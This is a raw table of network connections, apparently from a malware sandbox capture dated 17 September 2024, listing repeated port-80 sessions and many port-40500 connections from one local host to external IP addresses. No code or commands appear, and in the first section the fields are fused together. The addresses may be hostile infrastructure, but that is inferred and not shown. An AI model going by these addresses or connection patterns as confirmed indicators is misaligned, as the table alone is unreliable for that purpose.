                                            Sep 17, 2024 23:11:38.048469067 CEST40500497922.135.128.182192.168.2.4
                                            Sep 17, 2024 23:11:39.052699089 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.131247044 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.131350040 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.131509066 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.170964003 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.289340019 CEST405004978331.25.131.226192.168.2.4
                                            Sep 17, 2024 23:11:39.291559935 CEST4978340500192.168.2.431.25.131.226
                                            Sep 17, 2024 23:11:39.986016989 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986195087 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986211061 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986361027 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.986361027 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.986448050 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986484051 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986516953 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986529112 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.986551046 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.986558914 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.986963034 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.987773895 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.987801075 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:39.989710093 CEST8049793185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:39.989774942 CEST4979380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.006160021 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.029025078 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.029115915 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.029292107 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.048291922 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.832546949 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.832598925 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.832653046 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.832653999 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.832695961 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.832695961 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.834614038 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.834651947 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.834676027 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.834686041 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.834696054 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.834723949 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:41.834727049 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:41.834767103 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.003959894 CEST4979540500192.168.2.42.191.116.122
                                            Sep 17, 2024 23:11:43.013196945 CEST40500497952.191.116.122192.168.2.4
                                            Sep 17, 2024 23:11:43.013392925 CEST4979540500192.168.2.42.191.116.122
                                            Sep 17, 2024 23:11:43.014558077 CEST4979540500192.168.2.42.191.116.122
                                            Sep 17, 2024 23:11:43.018871069 CEST4979540500192.168.2.42.191.116.122
                                            Sep 17, 2024 23:11:43.023828983 CEST40500497952.191.116.122192.168.2.4
                                            Sep 17, 2024 23:11:43.269581079 CEST40500497952.191.116.122192.168.2.4
                                            Sep 17, 2024 23:11:43.976484060 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.976872921 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.982098103 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:43.982651949 CEST8049794185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:43.982734919 CEST4979480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.982995987 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.982995987 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:43.988034964 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.243207932 CEST4050049784178.90.87.64192.168.2.4
                                            Sep 17, 2024 23:11:44.245121002 CEST4978440500192.168.2.4178.90.87.64
                                            Sep 17, 2024 23:11:44.682634115 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682692051 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682729006 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682775974 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682775974 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682799101 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682832956 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682845116 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682866096 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682876110 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682899952 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682915926 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682940960 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.682950974 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.682982922 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:44.691263914 CEST4979180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:11:44.696644068 CEST804979191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:11:44.696721077 CEST4979180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:11:44.771183968 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:44.771326065 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.801521063 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.801769972 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.806791067 CEST8049797185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:46.807316065 CEST8049796185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:46.807514906 CEST4979680192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.807744980 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.807744980 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:46.814243078 CEST8049797185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:47.503910065 CEST8049797185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:47.503983021 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:48.035156012 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:11:48.040345907 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:11:48.040455103 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:11:48.041407108 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:11:48.046421051 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:11:48.046530962 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:11:48.050254107 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:11:48.051373959 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:11:48.097517014 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:11:49.257345915 CEST4050049787185.194.125.74192.168.2.4
                                            Sep 17, 2024 23:11:49.257592916 CEST4978740500192.168.2.4185.194.125.74
                                            Sep 17, 2024 23:11:49.552448988 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:49.552877903 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:49.557956934 CEST8049797185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:49.558027029 CEST8049799185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:49.558027983 CEST4979780192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:49.558089972 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:49.558219910 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:49.563270092 CEST8049799185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:50.288872004 CEST8049799185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:50.288975954 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.364315033 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.364716053 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.369961023 CEST8049799185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:52.370040894 CEST4979980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.370440006 CEST8049800185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:52.370517015 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.370625019 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:52.375530958 CEST8049800185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:53.050717115 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:53.055974960 CEST4050049801159.100.18.229192.168.2.4
                                            Sep 17, 2024 23:11:53.056077957 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:53.057291031 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:53.062195063 CEST4050049801159.100.18.229192.168.2.4
                                            Sep 17, 2024 23:11:53.062258959 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:53.065824032 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:53.067146063 CEST4050049801159.100.18.229192.168.2.4
                                            Sep 17, 2024 23:11:53.080163956 CEST8049800185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:53.080321074 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:53.117501020 CEST4050049801159.100.18.229192.168.2.4
                                            Sep 17, 2024 23:11:53.523374081 CEST4050049801159.100.18.229192.168.2.4
                                            Sep 17, 2024 23:11:53.525106907 CEST4980140500192.168.2.4159.100.18.229
                                            Sep 17, 2024 23:11:54.289594889 CEST4050049790151.240.79.133192.168.2.4
                                            Sep 17, 2024 23:11:54.289812088 CEST4979040500192.168.2.4151.240.79.133
                                            Sep 17, 2024 23:11:55.108004093 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:55.108171940 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:55.113316059 CEST8049800185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:55.113364935 CEST8049802185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:55.113408089 CEST4980080192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:55.113447905 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:55.113538027 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:55.118463993 CEST8049802185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:55.821461916 CEST8049802185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:55.821522951 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.055834055 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.056165934 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.061007023 CEST8049802185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:58.061057091 CEST4980280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.061497927 CEST8049803185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:58.061559916 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.061697006 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:58.066606998 CEST8049803185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:58.068881989 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:11:58.073709965 CEST40500498042.183.100.16192.168.2.4
                                            Sep 17, 2024 23:11:58.073832989 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:11:58.075484991 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:11:58.080251932 CEST40500498042.183.100.16192.168.2.4
                                            Sep 17, 2024 23:11:58.080332041 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:11:58.084441900 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:11:58.085176945 CEST40500498042.183.100.16192.168.2.4
                                            Sep 17, 2024 23:11:58.137394905 CEST40500498042.183.100.16192.168.2.4
                                            Sep 17, 2024 23:11:58.781685114 CEST8049803185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:11:58.781922102 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:11:59.417567015 CEST40500497922.135.128.182192.168.2.4
                                            Sep 17, 2024 23:11:59.417629004 CEST4979240500192.168.2.42.135.128.182
                                            Sep 17, 2024 23:12:01.820632935 CEST4980580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:01.826858997 CEST804980577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:01.826973915 CEST4980580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:01.827614069 CEST4980580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:01.833570957 CEST804980577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:03.094202042 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:03.099176884 CEST40500498065.232.149.197192.168.2.4
                                            Sep 17, 2024 23:12:03.099275112 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:03.100579977 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:03.105349064 CEST40500498065.232.149.197192.168.2.4
                                            Sep 17, 2024 23:12:03.105410099 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:03.110304117 CEST40500498065.232.149.197192.168.2.4
                                            Sep 17, 2024 23:12:03.112693071 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:03.161509037 CEST40500498065.232.149.197192.168.2.4
                                            Sep 17, 2024 23:12:03.474992037 CEST804980577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:03.475094080 CEST4980580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:03.486643076 CEST4980580192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:03.492096901 CEST804980577.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:04.399480104 CEST40500497952.191.116.122192.168.2.4
                                            Sep 17, 2024 23:12:04.399570942 CEST4979540500192.168.2.42.191.116.122
                                            Sep 17, 2024 23:12:05.505841970 CEST4980780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:05.511034966 CEST804980777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:05.511147976 CEST4980780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:05.511257887 CEST4980780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:05.516562939 CEST804980777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:07.188385963 CEST804980777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:07.188452005 CEST4980780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:07.221750975 CEST4980780192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:07.228400946 CEST804980777.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:08.129131079 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.134202003 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:08.134324074 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.135730982 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.140681982 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:08.140755892 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.143924952 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.145648956 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:08.189383984 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:09.240498066 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.245539904 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:09.245800018 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.245800018 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.250590086 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:09.414012909 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:12:09.417040110 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:12:10.900790930 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:10.900881052 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:10.900930882 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:10.905935049 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:12.937695980 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:12.985651970 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:12.985769033 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:12.986103058 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:13.040534019 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:13.191797018 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.209384918 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.209495068 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.225720882 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.269351006 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.277179956 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.565782070 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.606034040 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.629051924 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:14.779342890 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:14.779580116 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:14.779664993 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:14.801037073 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:16.802189112 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.809103012 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:16.809173107 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.809278011 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.821739912 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:18.285341978 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.292438984 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.292565107 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.293869972 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.298926115 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.298995972 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.300685883 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.303879976 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.354024887 CEST4050049813109.200.174.222192.168.2.4
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Sep 17, 2024 23:12:18.493155003 CEST  80        49812     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:18.495368004 CEST  49812     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:18.495574951 CEST  49812     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:18.878278971 CEST  49812     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:18.913873911 CEST  80        49812     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:18.915170908 CEST  49812     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:19.199734926 CEST  80        49812     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:19.199783087 CEST  80        49812     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:19.199888945 CEST  49812     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:19.661302090 CEST  40500     49804     2.183.100.16     192.168.2.4
Sep 17, 2024 23:12:19.661535025 CEST  49804     40500     192.168.2.4      2.183.100.16
Sep 17, 2024 23:12:20.520932913 CEST  49814     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:20.526204109 CEST  80        49814     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:20.527004957 CEST  49814     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:20.527097940 CEST  49814     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:20.532430887 CEST  80        49814     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:22.405818939 CEST  80        49814     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:22.405915976 CEST  49814     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:22.406094074 CEST  49814     80        192.168.2.4      77.91.77.92
Sep 17, 2024 23:12:22.414688110 CEST  80        49814     77.91.77.92      192.168.2.4
Sep 17, 2024 23:12:23.316504955 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:23.322115898 CEST  40500     49815     213.230.126.39   192.168.2.4
Sep 17, 2024 23:12:23.322212934 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:23.323297977 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:23.328326941 CEST  40500     49815     213.230.126.39   192.168.2.4
Sep 17, 2024 23:12:23.328397989 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:23.331442118 CEST  49815     40500     192.168.2.4      213.230.126.39
Sep 17, 2024 23:12:23.333739996 CEST  40500     49815     213.230.126.39   192.168.2.4
Sep 17, 2024 23:12:23.377593994 CEST  40500     49815     213.230.126.39   192.168.2.4
Sep 17, 2024 23:12:24.458720922 CEST  40500     49806     5.232.149.197    192.168.2.4
Sep 17, 2024 23:12:24.458786011 CEST  49806     40500     192.168.2.4      5.232.149.197
Sep 17, 2024 23:12:25.444511890 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:25.451554060 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:25.451675892 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:25.451838017 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:25.457576036 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.509773016 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.509943962 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.509984970 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510019064 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510035038 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510072947 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510107994 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510123014 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510123014 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510123014 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510144949 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510154009 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510179996 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510200977 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510231972 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510664940 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510704994 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.510905027 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510940075 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.510977030 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.511010885 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.511456013 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.511990070 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.512044907 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.512592077 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:26.522176027 CEST  80        49816     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:26.522250891 CEST  49816     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:27.527102947 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.070878029 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.071275949 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.071275949 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.077002048 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.347719908 CEST  49818     40500     192.168.2.4      194.93.26.70
Sep 17, 2024 23:12:28.370312929 CEST  40500     49818     194.93.26.70     192.168.2.4
Sep 17, 2024 23:12:28.370408058 CEST  49818     40500     192.168.2.4      194.93.26.70
Sep 17, 2024 23:12:28.371566057 CEST  49818     40500     192.168.2.4      194.93.26.70
Sep 17, 2024 23:12:28.378308058 CEST  49818     40500     192.168.2.4      194.93.26.70
Sep 17, 2024 23:12:28.390610933 CEST  40500     49818     194.93.26.70     192.168.2.4
Sep 17, 2024 23:12:28.440141916 CEST  40500     49818     194.93.26.70     192.168.2.4
Sep 17, 2024 23:12:28.782985926 CEST  80        49803     185.215.113.66   192.168.2.4
Sep 17, 2024 23:12:28.783216953 CEST  49803     80        192.168.2.4      185.215.113.66
Sep 17, 2024 23:12:28.823597908 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823653936 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823663950 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823693037 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823692083 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823726892 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823734045 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823759079 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823761940 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823796034 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823800087 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823827982 CEST  80        49817     91.202.233.141   192.168.2.4
Sep 17, 2024 23:12:28.823837042 CEST  49817     80        192.168.2.4      91.202.233.141
Sep 17, 2024 23:12:28.823865891 CEST  49817     80        192.168.2.4      91.202.233.141
